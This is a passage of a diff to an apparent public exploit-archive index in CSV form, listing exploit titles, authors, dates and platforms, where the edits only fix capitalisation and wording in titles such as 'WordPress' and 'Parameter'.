Injection",2007-11-17,"Aria-Security Team",asp,webapps,0 30776,platforms/linux/dos/30776.txt,"LIVE555 Media Server 2007.11.1 - ParseRTSPRequestString Remote Denial Of Service",2007-11-19,"Luigi Auriemma",linux,dos,0 -30777,platforms/cgi/webapps/30777.txt,"Citrix NetScaler 8.0 build 47.8 - Generic_API_Call.pl Cross-Site Scripting",2007-11-19,nnposter,cgi,webapps,0 +30777,platforms/cgi/webapps/30777.txt,"Citrix Netscaler 8.0 build 47.8 - Generic_API_Call.pl Cross-Site Scripting",2007-11-19,nnposter,cgi,webapps,0 30778,platforms/asp/webapps/30778.txt,"Click&BaneX - Details.asp SQL Injection",2007-11-19,"Aria-Security Team",asp,webapps,0 30779,platforms/multiple/dos/30779.txt,"Rigs of Rods 0.33d - Long Vehicle Name Buffer Overflow",2007-11-19,"Luigi Auriemma",multiple,dos,0 30780,platforms/linux/local/30780.txt,"ISPmanager 4.2.15 - Responder Privilege Escalation",2007-11-20,"Andrew Christensen",linux,local,0 -30781,platforms/osx/remote/30781.txt,"Apple Mac OSX 10.5.x - Mail Arbitrary Code Execution",2007-11-20,"heise Security",osx,remote,0 +30781,platforms/osx/remote/30781.txt,"Apple Mac OS X 10.5.x - Mail Arbitrary Code Execution",2007-11-20,"heise Security",osx,remote,0 31026,platforms/hardware/remote/31026.pl,"Fortinet Fortigate - CRLF Characters URL Filtering Bypass",2008-01-14,Danux,hardware,remote,0 30974,platforms/multiple/dos/30974.txt,"Asterisk 1.x - BYE Message Remote Denial of Service",2008-01-02,greyvoip,multiple,dos,0 30975,platforms/cgi/webapps/30975.txt,"W3-mSQL - Error Page Cross-Site Scripting",2008-01-03,vivek_infosec,cgi,webapps,0 30976,platforms/php/webapps/30976.txt,"MyPHP Forum 3.0 - 'search.php' Multiple Unspecified SQL Injection",2008-01-03,The:Paradox,php,webapps,0 -30977,platforms/php/webapps/30977.txt,"Wordpress 2.2.3 - wp-admin/post.php popuptitle Parameter Cross-Site Scripting",2008-01-03,3APA3A,php,webapps,0 +30977,platforms/php/webapps/30977.txt,"WordPress 2.2.3 - wp-admin/post.php popuptitle Parameter Cross-Site Scripting",2008-01-03,3APA3A,php,webapps,0 30786,platforms/php/webapps/30786.txt,"Middle School Homework Page 1.3 Beta 1 - Multiple Vulnerabilities",2014-01-07,"AtT4CKxT3rR0r1ST ",php,webapps,80 30787,platforms/php/remote/30787.rb,"vTiger CRM SOAP AddEmailAttachment - Arbitrary File Upload",2014-01-07,Metasploit,php,remote,80 30788,platforms/windows/local/30788.rb,"IcoFX - Stack Buffer Overflow",2014-01-07,Metasploit,windows,local,0 @@ -27777,7 +27778,7 @@ id,file,description,date,author,platform,type,port 30848,platforms/php/webapps/30848.txt,"Joomla 1.5 RC3 com_content - 'index.php' view Parameter SQL Injection",2007-12-05,beenudel1986,php,webapps,0 30849,platforms/php/webapps/30849.txt,"Joomla 1.5 RC3 com_search Component - 'index.php' Multiple Parameter SQL Injection",2007-12-05,beenudel1986,php,webapps,0 30850,platforms/multiple/remote/30850.txt,"Rejetto HTTP File Server (HFS) 2.2/2.3 - Arbitrary File Upload",2007-12-05,"Luigi Auriemma",multiple,remote,0 -30851,platforms/php/webapps/30851.txt,"VisualShapers ezContents 1.4.5 - File Disclosure",2007-12-05,p4imi0,php,webapps,0 +30851,platforms/php/webapps/30851.txt,"VisualShapers EZContents 1.4.5 - File Disclosure",2007-12-05,p4imi0,php,webapps,0 30852,platforms/php/webapps/30852.txt,"Kayako SupportSuite 3.0.32 - PHP_SELF Trigger_Error Function Cross-Site Scripting",2007-12-06,imei,php,webapps,0 30853,platforms/php/webapps/30853.txt,"OpenNewsletter 2.5 - Compose.php Cross-Site Scripting",2007-12-06,Manu,php,webapps,0 30854,platforms/php/webapps/30854.sh,"wwwstats 3.21 - Clickstats.php Multiple HTML Injection Vulnerabilities",2007-12-15,"Jesus Olmos Gonzalez",php,webapps,0 @@ -27796,7 +27797,7 @@ id,file,description,date,author,platform,type,port 30886,platforms/php/webapps/30886.txt,"MKPortal 1.1 Gallery Module - SQL Injection",2007-12-13,"Sw33t h4cK3r",php,webapps,0 30887,platforms/php/webapps/30887.txt,"phPay 2.2.1 - Windows Installations Local File Inclusion",2007-12-15,"Michael Brooks",php,webapps,0 30888,platforms/php/webapps/30888.txt,"phpRPG 0.8 - /tmp Directory PHPSESSID Cookie Session Hijacking",2007-12-15,"Michael Brooks",php,webapps,0 -30889,platforms/php/webapps/30889.txt,"Wordpress 2.3.1 - Unauthorized Post Access",2007-12-15,"Michael Brooks",php,webapps,0 +30889,platforms/php/webapps/30889.txt,"WordPress 2.3.1 - Unauthorized Post Access",2007-12-15,"Michael Brooks",php,webapps,0 30890,platforms/php/webapps/30890.txt,"Black Sheep Web Software Form Tools 1.5 - Multiple Remote File Inclusion",2007-12-14,RoMaNcYxHaCkEr,php,webapps,0 30891,platforms/php/webapps/30891.txt,"Flyspray 0.9.9 - Multiple Cross-Site Scripting Vulnerabilities",2007-12-09,"KAWASHIMA Takahiro",php,webapps,0 30892,platforms/php/webapps/30892.txt,"Neuron News 1.0 - Multiple SQL Injections / Cross-Site Scripting Vulnerabilities",2007-12-17,"hadihadi & black.shadowes",php,webapps,0 @@ -27836,11 +27837,11 @@ id,file,description,date,author,platform,type,port 30927,platforms/php/webapps/30927.txt,"Agares Media ThemeSiteScript 1.0 - 'loadadminpage' Parameter Remote File Inclusion",2007-12-24,Koller,php,webapps,0 30928,platforms/php/remote/30928.php,"PDFlib 7.0.2 - Multiple Remote Buffer Overflow Vulnerabilities",2007-12-24,poplix,php,remote,0 30929,platforms/php/webapps/30929.txt,"Logaholic - update.php page Parameter SQL Injection",2007-12-24,malibu.r,php,webapps,0 -30930,platforms/php/webapps/30930.txt,"Logaholic - 'index.php' parameter Parameter SQL Injection",2007-12-24,malibu.r,php,webapps,0 +30930,platforms/php/webapps/30930.txt,"Logaholic - 'index.php' Parameter Parameter SQL Injection",2007-12-24,malibu.r,php,webapps,0 30931,platforms/php/webapps/30931.txt,"Logaholic - 'index.php' conf Parameter Cross-Site Scripting",2007-12-24,malibu.r,php,webapps,0 30932,platforms/php/webapps/30932.txt,"Logaholic - profiles.php newconfname Parameter Cross-Site Scripting",2007-12-24,malibu.r,php,webapps,0 30933,platforms/multiple/remote/30933.php,"Zoom Player 3.30/5/6 - Crafted .ZPL File Error Message Arbitrary Code Execution",2007-12-24,"Luigi Auriemma",multiple,remote,0 -30934,platforms/windows/dos/30934.txt,"Total Player 3.0 - .m3u File Denial of Service",2007-12-25,"David G.M.",windows,dos,0 +30934,platforms/windows/dos/30934.txt,"Total Player 3.0 - '.m3u' File Denial of Service",2007-12-25,"David G.M.",windows,dos,0 30935,platforms/hardware/remote/30935.txt,"ZYXEL P-330W - Multiple Vulnerabilities",2007-12-25,santa_clause,hardware,remote,0 30936,platforms/windows/dos/30936.html,"AOL Picture Editor 'YGPPicEdit.dll' ActiveX Control 9.5.1.8 - Multiple Buffer Overflow Vulnerabilities",2007-12-25,"Elazar Broad",windows,dos,0 30937,platforms/php/webapps/30937.txt,"Limbo CMS 1.0.4 - 'com_option' Parameter Cross-Site Scripting",2007-12-25,"Omer Singer",php,webapps,0 @@ -27852,7 +27853,7 @@ id,file,description,date,author,platform,type,port 30943,platforms/multiple/dos/30943.txt,"Libnemesi 0.6.4-rc1 - Multiple Remote Buffer Overflow Vulnerabilities",2007-12-27,"Luigi Auriemma",multiple,dos,0 30944,platforms/multiple/remote/30944.txt,"Feng 0.1.15 - Multiple Remote Buffer Overflow / Denial of Service Vulnerabilities",2007-12-27,"Luigi Auriemma",multiple,remote,0 30945,platforms/php/webapps/30945.txt,"NetBizCity FaqMasterFlexPlus - 'faq.php' Cross-Site Scripting",2007-12-28,"Juan Galiana Lara",php,webapps,0 -30946,platforms/php/webapps/30946.txt,"Collabtive 1.1 - (managetimetracker.php id parameter) SQL Injection",2014-01-15,"Yogesh Phadtare",php,webapps,80 +30946,platforms/php/webapps/30946.txt,"Collabtive 1.1 - (managetimetracker.php id Parameter) SQL Injection",2014-01-15,"Yogesh Phadtare",php,webapps,80 30947,platforms/php/webapps/30947.txt,"NetBizCity FaqMasterFlexPlus - 'faq.php' SQL Injection",2007-12-28,"Juan Galiana Lara",php,webapps,0 30948,platforms/php/webapps/30948.txt,"OpenBiblio 0.x - staff_del_confirm.php Multiple Parameter Cross-Site Scripting",2007-12-28,"Juan Galiana Lara",php,webapps,0 30949,platforms/php/webapps/30949.txt,"OpenBiblio 0.x - theme_del_confirm.php name Parameter Cross-Site Scripting",2007-12-28,"Juan Galiana Lara",php,webapps,0 @@ -27873,7 +27874,7 @@ id,file,description,date,author,platform,type,port 30965,platforms/php/webapps/30965.txt,"LiveCart 1.0.1 - category q Parameter Cross-Site Scripting",2007-12-31,Doz,php,webapps,0 30966,platforms/php/webapps/30966.txt,"LiveCart 1.0.1 - order return Parameter Cross-Site Scripting",2007-12-31,Doz,php,webapps,0 30967,platforms/php/webapps/30967.txt,"LiveCart 1.0.1 - user/remindComplete email Parameter Cross-Site Scripting",2007-12-31,Doz,php,webapps,0 -30979,platforms/php/webapps/30979.txt,"Wordpress 2.2.3 - wp-admin/edit.php backup Parameter Cross-Site Scripting",2008-01-03,3APA3A,php,webapps,0 +30979,platforms/php/webapps/30979.txt,"WordPress 2.2.3 - wp-admin/edit.php backup Parameter Cross-Site Scripting",2008-01-03,3APA3A,php,webapps,0 30980,platforms/php/webapps/30980.txt,"AwesomeTemplateEngine 1 - Multiple Cross-Site Scripting Vulnerabilities",2008-01-03,MustLive,php,webapps,0 30981,platforms/php/webapps/30981.txt,"PRO-Search 0.17 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2008-01-03,MustLive,php,webapps,0 30982,platforms/php/webapps/30982.html,"Nucleus CMS 3.0.1 - 'myid' Parameter SQL Injection",2008-01-03,MustLive,php,webapps,0 @@ -27922,14 +27923,14 @@ id,file,description,date,author,platform,type,port 31034,platforms/php/webapps/31034.txt,"MyBB 1.2.10 - 'moderation.php' Multiple SQL Injection",2008-01-16,waraxe,php,webapps,0 31035,platforms/php/webapps/31035.txt,"Clever Copy 3.0 - Multiple SQL Injections / Cross-Site Scripting Vulnerabilities",2008-01-17,hadihadi,php,webapps,0 31036,platforms/windows/local/31036.txt,"CORE FORCE Firewall 0.95.167 and Registry Modules - Multiple Local Kernel Buffer Overflow Vulnerabilities",2008-01-17,"Sebastian Gottschalk",windows,local,0 -31037,platforms/php/webapps/31037.txt,"PHPAutoVideo 2.21 - sidebar.php loadpage Parameter Remote File Inclusion",2008-01-18,"H-T Team",php,webapps,0 -31038,platforms/php/webapps/31038.txt,"PHPAutoVideo 2.21 - 'index.php' cat Parameter Cross-Site Scripting",2008-01-18,"H-T Team",php,webapps,0 +31037,platforms/php/webapps/31037.txt,"phpAutoVideo 2.21 - sidebar.php loadpage Parameter Remote File Inclusion",2008-01-18,"H-T Team",php,webapps,0 +31038,platforms/php/webapps/31038.txt,"phpAutoVideo 2.21 - 'index.php' cat Parameter Cross-Site Scripting",2008-01-18,"H-T Team",php,webapps,0 31039,platforms/windows/remote/31039.txt,"BitDefender Products - Update Server HTTP Daemon Directory Traversal",2008-01-19,"Oliver Karow",windows,remote,0 31040,platforms/windows/remote/31040.html,"Toshiba Surveillance Surveillix DVR 'MeIpCamX.dll' 1.0 - ActiveX Control Buffer Overflow",2008-01-20,rgod,windows,remote,0 -31041,platforms/php/webapps/31041.txt,"bloofoxCMS 0.3 - Multiple Input Validation Vulnerabilities",2008-01-20,"AmnPardaz ",php,webapps,0 +31041,platforms/php/webapps/31041.txt,"BloofoxCMS 0.3 - Multiple Input Validation Vulnerabilities",2008-01-20,"AmnPardaz ",php,webapps,0 31042,platforms/asp/webapps/31042.txt,"MegaBBS 1.5.14b - 'upload.asp' Cross-Site Scripting",2008-01-21,Doz,asp,webapps,0 31043,platforms/cgi/webapps/31043.txt,"Alice Gate2 Plus Wi-Fi Router - Cross-Site Request Forgery",2008-01-21,WarGame,cgi,webapps,0 -31044,platforms/php/webapps/31044.txt,"singapore 0.10.1 Modern Template - 'gallery' Parameter Cross-Site Scripting",2008-01-21,trew,php,webapps,0 +31044,platforms/php/webapps/31044.txt,"Singapore 0.10.1 Modern Template - 'gallery' Parameter Cross-Site Scripting",2008-01-21,trew,php,webapps,0 31045,platforms/php/webapps/31045.txt,"Small Axe Weblog 0.3.1 - 'ffile' Parameter Remote File Inclusion",2008-01-21,anonymous,php,webapps,0 31046,platforms/windows/remote/31046.cpp,"GlobalLink 'GLChat.ocx' 2.5.1 - ActiveX Control 'ChatRoom()' Buffer Overflow",2008-01-09,Knell,windows,remote,0 31047,platforms/multiple/remote/31047.txt,"Novemberborn sIFR 2.0.2/3 - 'txt' Parameter Cross-Site Scripting",2008-01-22,"Jan Fry",multiple,remote,0 @@ -27942,7 +27943,7 @@ id,file,description,date,author,platform,type,port 31054,platforms/linux/dos/31054.txt,"SDL_image 1.2.6 - Invalid GIF File LWZ Minimum Code Size Remote Buffer Overflow",2008-01-23,"Gynvael Coldwind",linux,dos,0 31055,platforms/asp/webapps/31055.txt,"Multiple Web Wiz Products - Remote Information Disclosure",2008-01-23,"AmnPardaz ",asp,webapps,0 31056,platforms/windows/remote/31056.py,"Rejetto HTTP File Server (HFS) 1.5/2.x - Multiple Security Vulnerabilities",2008-01-23,"Felipe M. Aragon",windows,remote,0 -31057,platforms/osx/dos/31057.html,"Apple iPhone Mobile Safari - Memory Exhaustion Remote Denial of Service",2008-01-24,fuzion,osx,dos,0 +31057,platforms/osx/dos/31057.html,"Apple iOS Mobile Safari - Memory Exhaustion Remote Denial of Service",2008-01-24,fuzion,osx,dos,0 31058,platforms/asp/webapps/31058.txt,"Pre Hotel and Resorts - 'user_login.asp' Multiple SQL Injection Vulnerabilities",2008-01-25,milad_sa2007,asp,webapps,0 31059,platforms/asp/webapps/31059.txt,"E-SMART CART - 'Members Login' Multiple SQL Injection Vulnerabilities",2008-01-25,milad_sa2007,asp,webapps,0 31060,platforms/php/webapps/31060.txt,"Drake CMS 0.4.9 - 'index.php' Cross-Site Scripting",2008-01-25,"Omer Singer",php,webapps,0 @@ -27974,11 +27975,11 @@ id,file,description,date,author,platform,type,port 31088,platforms/hardware/webapps/31088.py,"BLUE COM Router 5360/52018 - Password Reset Exploit",2014-01-20,KAI,hardware,webapps,80 31090,platforms/windows/local/31090.txt,"MuPDF 1.3 - Stack Based Buffer Overflow in xps_parse_color()",2014-01-20,"Jean-Jamil Khalife",windows,local,0 31091,platforms/php/webapps/31091.txt,"Domain Trader 2.0 - 'catalog.php' Cross-Site Scripting",2008-02-02,Crackers_Child,php,webapps,0 -31092,platforms/php/webapps/31092.txt,"WP-Footnotes 2.2 Wordpress Plugin - Multiple Remote Vulnerabilities",2008-02-02,NBBN,php,webapps,0 +31092,platforms/php/webapps/31092.txt,"WP-Footnotes 2.2 WordPress Plugin - Multiple Remote Vulnerabilities",2008-02-02,NBBN,php,webapps,0 31093,platforms/php/webapps/31093.txt,"ITechClassifieds - viewcat.php CatID Parameter SQL Injection",2008-02-02,Crackers_Child,php,webapps,0 31094,platforms/php/webapps/31094.txt,"ITechClassifieds - viewcat.php CatID Parameter Cross-Site Scripting",2008-02-02,Crackers_Child,php,webapps,0 -31095,platforms/novell/remote/31095.txt,"Novell GroupWise 5.57e/6.5.7/7.0 WebAccess - Multiple Cross-Site Scripting Vulnerabilities",2008-01-31,"Frederic Loudet",novell,remote,0 -31096,platforms/php/webapps/31096.txt,"Wordpress Plugin ShiftThis Newsletter - SQL Injection",2008-02-03,S@BUN,php,webapps,0 +31095,platforms/novell/remote/31095.txt,"Novell Groupwise 5.57e/6.5.7/7.0 Webaccess - Multiple Cross-Site Scripting Vulnerabilities",2008-01-31,"Frederic Loudet",novell,remote,0 +31096,platforms/php/webapps/31096.txt,"WordPress Plugin ShiftThis NewsLetter - SQL Injection",2008-02-03,S@BUN,php,webapps,0 31097,platforms/php/webapps/31097.txt,"CruxCMS 3.0 - 'search.php' Cross-Site Scripting",2008-02-04,Psiczn,php,webapps,0 31098,platforms/php/webapps/31098.txt,"Simple OS CMS 0.1c_beta - 'login.php' SQL Injection",2008-02-04,Psiczn,php,webapps,0 31099,platforms/php/webapps/31099.txt,"Codice CMS - 'login.php' SQL Injection",2008-02-04,Psiczn,php,webapps,0 @@ -28008,7 +28009,7 @@ id,file,description,date,author,platform,type,port 31123,platforms/php/webapps/31123.txt,"PowerScripts PowerNews 2.5.6 - 'subpage' Parameter Multiple Local File Inclusion",2008-02-08,"Alexandr Polyakov",php,webapps,0 31124,platforms/php/webapps/31124.txt,"Calimero.CMS 3.3 - 'id' Parameter Cross-Site Scripting",2008-02-08,Psiczn,php,webapps,0 31125,platforms/php/webapps/31125.txt,"Joovili 2.1 - 'members_help.php' Remote File Inclusion",2008-02-08,Cr@zy_King,php,webapps,0 -31126,platforms/php/webapps/31126.txt,"Serendipity Freetag-plugin 2.95 - 'style' parameter Cross-Site Scripting",2008-02-08,"Alexander Brachmann",php,webapps,0 +31126,platforms/php/webapps/31126.txt,"Serendipity Freetag-plugin 2.95 - 'style' Parameter Cross-Site Scripting",2008-02-08,"Alexander Brachmann",php,webapps,0 31127,platforms/linux/remote/31127.txt,"Mozilla Firefox 2.0.9 - 'view-source:' Scheme Information Disclosure",2008-02-08,"Ronald van den Heetkamp",linux,remote,0 31128,platforms/multiple/dos/31128.txt,"Multiple IEA Software Products - HTTP POST Request Denial of Service",2008-02-08,"Luigi Auriemma",multiple,dos,0 31129,platforms/php/webapps/31129.txt,"Managed Workplace Service Center 4.x/5.x/6.x - Installation Information Disclosure",2008-02-08,"Brook Powers",php,webapps,0 @@ -28024,12 +28025,12 @@ id,file,description,date,author,platform,type,port 31139,platforms/windows/dos/31139.txt,"Larson Network Print Server 9.4.2 build 105 - (LstNPS) Logging Function USEP Command Remote Format String",2008-02-11,"Luigi Auriemma",windows,dos,0 31140,platforms/php/webapps/31140.txt,"iTechClassifieds 3.03.057 - SQL Injection",2014-01-23,vinicius777,php,webapps,0 31141,platforms/php/webapps/31141.txt,"godontologico 5 - SQL Injection",2014-01-23,vinicius777,php,webapps,0 -31142,platforms/php/webapps/31142.txt,"Simple e-document 1.31 - Login bypass",2014-01-23,vinicius777,php,webapps,0 +31142,platforms/php/webapps/31142.txt,"Simple E-document 1.31 - Login Bypass",2014-01-23,vinicius777,php,webapps,0 31143,platforms/php/webapps/31143.txt,"PizzaInn_Project - SQL Injection",2014-01-23,vinicius777,php,webapps,0 31144,platforms/php/webapps/31144.txt,"mySeatXT 0.2134 - SQL Injection",2014-01-23,vinicius777,php,webapps,0 31145,platforms/php/webapps/31145.txt,"Easy POS System - SQL Injection (login.php)",2014-01-23,vinicius777,php,webapps,0 31146,platforms/php/webapps/31146.txt,"Cells Blog 3.3 - Reflected Cross-Site Scripting / Blind SQLite Injection",2014-01-23,vinicius777,php,webapps,0 -31147,platforms/php/webapps/31147.txt,"Adult Webmaster PHP - Password Disclosure",2014-01-23,vinicius777,php,webapps,0 +31147,platforms/php/webapps/31147.txt,"Adult WebMaster PHP - Password Disclosure",2014-01-23,vinicius777,php,webapps,0 31148,platforms/multiple/dos/31148.txt,"Opium OPI Server and CyanPrintIP - Format String / Denial of Service",2008-02-11,"Luigi Auriemma",multiple,dos,0 31149,platforms/windows/remote/31149.txt,"Sentinel Protection Server 7.x/Keys Server 1.0.x - Backslash Directory Traversal",2008-02-11,"Luigi Auriemma",windows,remote,0 31150,platforms/multiple/dos/31150.txt,"RPM Remote Print Manager 4.5.1 - Service Remote Buffer Overflow",2008-02-11,"Luigi Auriemma",multiple,dos,0 @@ -28056,18 +28057,18 @@ id,file,description,date,author,platform,type,port 31336,platforms/php/webapps/31336.txt,"Podcast Generator 0.96.2 - 'set_permissions.php' Cross-Site Scripting",2008-03-05,ZoRLu,php,webapps,0 31700,platforms/php/webapps/31700.txt,"e107 CMS 0.7 - Multiple Cross-Site Scripting Vulnerabilities",2008-04-24,ZoRLu,php,webapps,0 31701,platforms/php/webapps/31701.txt,"Digital Hive 2.0 - 'base.php' Parameter Cross-Site Scripting",2008-04-24,ZoRLu,php,webapps,0 -31683,platforms/hardware/remote/31683.php,"Linksys E-series - Unauthenticated Remote Code Execution Exploit",2014-02-16,Rew,hardware,remote,0 +31683,platforms/hardware/remote/31683.php,"Linksys E-series - Unauthenticated Remote Code Execution",2014-02-16,Rew,hardware,remote,0 31173,platforms/php/webapps/31173.txt,"pChart 2.1.3 - Multiple Vulnerabilities",2014-01-24,"Balazs Makany",php,webapps,80 31174,platforms/php/webapps/31174.txt,"Joomla Komento Extension 1.7.2 - Persistent Cross-Site Scripting",2014-01-24,"High-Tech Bridge SA",php,webapps,80 -31175,platforms/php/webapps/31175.txt,"Joomla JV Comment Extension 3.0.2 - (index.php id parameter) SQL Injection",2014-01-24,"High-Tech Bridge SA",php,webapps,80 +31175,platforms/php/webapps/31175.txt,"Joomla JV Comment Extension 3.0.2 - (index.php id Parameter) SQL Injection",2014-01-24,"High-Tech Bridge SA",php,webapps,80 31176,platforms/windows/dos/31176.html,"MW6 Technologies Aztec ActiveX (Data parameter) - Buffer Overflow",2014-01-24,"Pedro Ribeiro",windows,dos,0 -31177,platforms/windows/dos/31177.html,"MW6 Technologies DataMatrix - ActiveX (Data parameter) - Buffer Overflow",2014-01-24,"Pedro Ribeiro",windows,dos,0 +31177,platforms/windows/dos/31177.html,"MW6 Technologies Datamatrix - ActiveX (Data Parameter) - Buffer Overflow",2014-01-24,"Pedro Ribeiro",windows,dos,0 31178,platforms/windows/dos/31178.html,"MW6 Technologies MaxiCode ActiveX (Data parameter) - Buffer Overflow",2014-01-24,"Pedro Ribeiro",windows,dos,0 31179,platforms/windows/remote/31179.html,"Daum Game 1.1.0.5 - ActiveX (IconCreate Method) Stack Buffer Overflow",2014-01-24,"Trustwave's SpiderLabs",windows,remote,0 31180,platforms/hardware/webapps/31180.txt,"Franklin Fueling TS-550 evo 2.0.0.6833 - Multiple Vulnerabilities",2014-01-24,"Trustwave's SpiderLabs",hardware,webapps,10001 31181,platforms/windows/remote/31181.rb,"HP Data Protector - Backup Client Service Directory Traversal",2014-01-24,Metasploit,windows,remote,5555 31182,platforms/windows/local/31182.txt,"Ammyy Admin 3.2 - Authentication Bypass",2014-01-24,"Bhadresh Patel",windows,local,0 -31183,platforms/php/webapps/31183.txt,"SkyBlueCanvas CMS 1.1 r248-03 - Remote Command Execution",2014-01-24,"Scott Parish",php,webapps,80 +31183,platforms/php/webapps/31183.txt,"Skybluecanvas CMS 1.1 r248-03 - Remote Command Execution",2014-01-24,"Scott Parish",php,webapps,80 31305,platforms/linux/dos/31305.c,"Linux Kernel 3.4 < 3.13.2 - recvmmsg x32 compat PoC (1)",2014-01-31,"Kees Cook",linux,dos,0 31272,platforms/php/webapps/31272.txt,"Joomla! and Mambo 'com_joomlavvz' Component - 'id' Parameter SQL Injection",2008-02-20,S@BUN,php,webapps,0 31273,platforms/php/webapps/31273.txt,"Joomla! and Mambo 'com_most' Component - 'secid' Parameter SQL Injection",2008-02-21,S@BUN,php,webapps,0 @@ -28116,16 +28117,16 @@ id,file,description,date,author,platform,type,port 32246,platforms/php/webapps/32246.txt,"Nortel Networks SRG V16 - admin_modules.php module Parameter Traversal Local File Inclusion",2008-08-13,CraCkEr,php,webapps,0 32247,platforms/php/webapps/32247.txt,"Nortel Networks SRG V16 - modules.php module Parameter Traversal Local File Inclusion",2008-08-13,CraCkEr,php,webapps,0 31220,platforms/linux/dos/31220.py,"MP3Info 0.8.5a - Buffer Overflow",2014-01-27,jsacco,linux,dos,0 -31221,platforms/windows/webapps/31221.txt,"Ability Mail Server 2013 - Password Reset Cross-Site Request Forgery from Persistent Cross-Site Scripting (Web UI)",2014-01-27,"David Um",windows,webapps,0 +31221,platforms/windows/webapps/31221.txt,"Ability Mail Server 2013 - Password Reset Cross-Site Request Forgery (via Persistent Cross-Site Scripting)",2014-01-27,"David Um",windows,webapps,0 31222,platforms/windows/dos/31222.py,"Oracle Outside In MDB - File Parsing Stack Based Buffer Overflow (PoC)",2014-01-27,Citadelo,windows,dos,0 31223,platforms/multiple/dos/31223.txt,"Mozilla Thunderbird 17.0.6 - Input Validation Filter Bypass",2014-01-27,Vulnerability-Lab,multiple,dos,0 31224,platforms/php/webapps/31224.txt,"Joomla! and Mambo com_profile Component - 'oid' Parameter SQL Injection",2008-02-19,S@BUN,php,webapps,0 31225,platforms/php/webapps/31225.html,"RunCMS 1.6.1 - 'admin.php' Cross-Site Scripting",2008-02-18,NBBN,php,webapps,0 31226,platforms/php/webapps/31226.txt,"Joomla! and Mambo com_detail Component - 'id' Parameter SQL Injection",2008-02-18,S@BUN,php,webapps,0 31227,platforms/php/webapps/31227.txt,"Yellow Swordfish Simple Forum 1.x - 'sf-profile.php' SQL Injection",2008-02-18,S@BUN,php,webapps,0 -31228,platforms/php/webapps/31228.txt,"Wordpress Recipes Blog Plugin 'id' Parameter - SQL Injection",2008-02-18,S@BUN,php,webapps,0 +31228,platforms/php/webapps/31228.txt,"WordPress Recipes Blog Plugin 'id' Parameter - SQL Injection",2008-02-18,S@BUN,php,webapps,0 31229,platforms/php/webapps/31229.txt,"ProjectPier 0.8 - Multiple HTML Injection / Cross-Site Scripting Vulnerabilities",2008-02-18,L4teral,php,webapps,0 -31230,platforms/php/webapps/31230.txt,"Wordpress wp-people Plugin 2.0 - 'wp-people-popup.php' SQL Injection",2008-02-18,S@BUN,php,webapps,0 +31230,platforms/php/webapps/31230.txt,"WordPress wp-people Plugin 2.0 - 'wp-people-popup.php' SQL Injection",2008-02-18,S@BUN,php,webapps,0 31231,platforms/windows/remote/31231.txt,"SIMM-Comm SCI Photo Chat 3.4.9 - Directory Traversal",2008-02-19,"Luigi Auriemma",windows,remote,0 31232,platforms/multiple/dos/31232.txt,"Foxit WAC Remote Access Server 2.0 Build 3503 - Heap Buffer Overflow",2008-02-16,"Luigi Auriemma",multiple,dos,0 31233,platforms/multiple/webapps/31233.txt,"WebcamXP 3.72.440/4.05.280 Beta - /pocketpc camnum Variable Arbitrary Memory Disclosure",2008-02-18,"Luigi Auriemma",multiple,webapps,0 @@ -28153,7 +28154,7 @@ id,file,description,date,author,platform,type,port 31255,platforms/windows/remote/31255.py,"PCMAN FTP 2.07 - CWD Command Buffer Overflow",2014-01-29,"Mahmod Mahajna (Mahy)",windows,remote,21 31256,platforms/php/webapps/31256.txt,"LinPHA 1.3.4 - Multiple Vulnerabilities",2014-01-29,killall-9,php,webapps,80 31331,platforms/php/webapps/31331.txt,"PHP-Nuke eGallery 3.0 Module - 'pid' Parameter SQL Injection",2008-03-04,"Aria-Security Team",php,webapps,0 -31332,platforms/php/webapps/31332.txt,"PHP-Nuke 'Seminars' Module - 'fileName' Parameter Local File Inclusion",2008-03-04,The-0utl4w,php,webapps,0 +31332,platforms/php/webapps/31332.txt,"PHP-Nuke 'Seminars' Module - 'Filename' Parameter Local File Inclusion",2008-03-04,The-0utl4w,php,webapps,0 31333,platforms/bsd/dos/31333.txt,"BSD PPP 'pppx.conf' - Local Denial of Service",2008-03-04,sipherr,bsd,dos,0 31528,platforms/php/webapps/31528.txt,"Le Forum 'Fichier_Acceuil' Parameter - Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0 31462,platforms/linux/remote/31462.c,"xine-lib - Multiple Heap Based Remote Buffer Overflow Vulnerabilities",2008-03-20,"Luigi Auriemma",linux,remote,0 @@ -28162,7 +28163,7 @@ id,file,description,date,author,platform,type,port 31261,platforms/hardware/webapps/31261.txt,"A10 Networks Loadbalancer - Directory Traversal",2014-01-29,xistence,hardware,webapps,443 31262,platforms/php/webapps/31262.txt,"ManageEngine Support Center Plus 7916 - Directory Traversal",2014-01-29,xistence,php,webapps,80 31263,platforms/php/webapps/31263.txt,"pfSense 2.1 build 20130911-1816 - Directory Traversal",2014-01-29,@u0x,php,webapps,0 -31264,platforms/php/remote/31264.rb,"Simple E-Document - Arbitrary File Upload",2014-01-29,Metasploit,php,remote,80 +31264,platforms/php/remote/31264.rb,"Simple E-document - Arbitrary File Upload",2014-01-29,Metasploit,php,remote,80 31275,platforms/asp/webapps/31275.txt,"Eagle Software Aeries Student Information System 3.7.2.2/3.8.2.8 - Comments.asp FC Parameter SQL Injection",2008-02-21,"Arsalan Emamjomehkashan",asp,webapps,0 31276,platforms/asp/webapps/31276.txt,"Eagle Software Aeries Student Information System 3.7.2.2/3.8.2.8 - Labels.asp Term Parameter SQL Injection",2008-02-21,"Arsalan Emamjomehkashan",asp,webapps,0 31277,platforms/php/webapps/31277.txt,"Eagle Software Aeries Student Information System 3.7.2.2/3.8.2.8 - ClassList.asp Term Parameter SQL Injection",2008-02-21,"Arsalan Emamjomehkashan",php,webapps,0 @@ -28174,7 +28175,7 @@ id,file,description,date,author,platform,type,port 31283,platforms/php/webapps/31283.txt,"PHP-Nuke Downloads Module - 'sid' Parameter SQL Injection",2008-02-21,S@BUN,php,webapps,0 31284,platforms/php/webapps/31284.txt,"XOOPS 'prayerlist' Module - 'cid' Parameter SQL Injection",2008-02-21,S@BUN,php,webapps,0 31285,platforms/multiple/dos/31285.txt,"Zilab Chat and Instant Messaging (ZIM) 2.0/2.1 Server - Multiple Vulnerabilities",2008-02-21,"Luigi Auriemma",multiple,dos,0 -31286,platforms/asp/webapps/31286.txt,"Citrix MetaFrame Web Manager - 'login.asp' Cross-Site Scripting",2008-02-22,Handrix,asp,webapps,0 +31286,platforms/asp/webapps/31286.txt,"Citrix Metaframe Web Manager - 'login.asp' Cross-Site Scripting",2008-02-22,Handrix,asp,webapps,0 31287,platforms/php/webapps/31287.txt,"PHP-Nuke Recipe Module 1.3 